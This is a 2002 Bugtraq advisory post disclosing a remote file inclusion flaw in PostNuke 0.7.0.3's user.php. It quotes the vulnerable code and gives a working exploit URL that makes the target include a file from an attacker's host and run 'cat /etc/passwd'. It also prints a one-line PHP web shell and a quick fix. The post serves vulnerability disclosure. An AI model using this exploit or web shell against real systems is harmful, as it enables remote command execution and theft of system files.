Bugtraq mailing list archives
postnuke v 0.7.0.3 remote command execution
From: pokleyzz sakamaniaka <pokleyzz () hotmail com>
Date: 28 Mar 2002 01:03:21 -0000
post nuke is one of popular content management system written in php . there are bug in file user.php line 107 which user can append $caselist array with their own value. foreach ($caselist as $k=>$v) { $ModName = $v['module']; include "$v[path]/$k"; } $caselist = array(); http://lame_host/user.php?caselist[bad_file.txt][path] =http://bad_host&command=cat%20/etc/passwd bad_file.txt (put in bad_host document root): -- start bad_file.txt ----- <pre> <?php system($command); ?> -- end bad_file.txt ----- quick fix: put on line 28 : $caselist = array(); http://inetd-secure.net/ http://www.mybsd.org.my/pokleyzz/
Current thread:
- postnuke v 0.7.0.3 remote command execution pokleyzz sakamaniaka (Mar 28)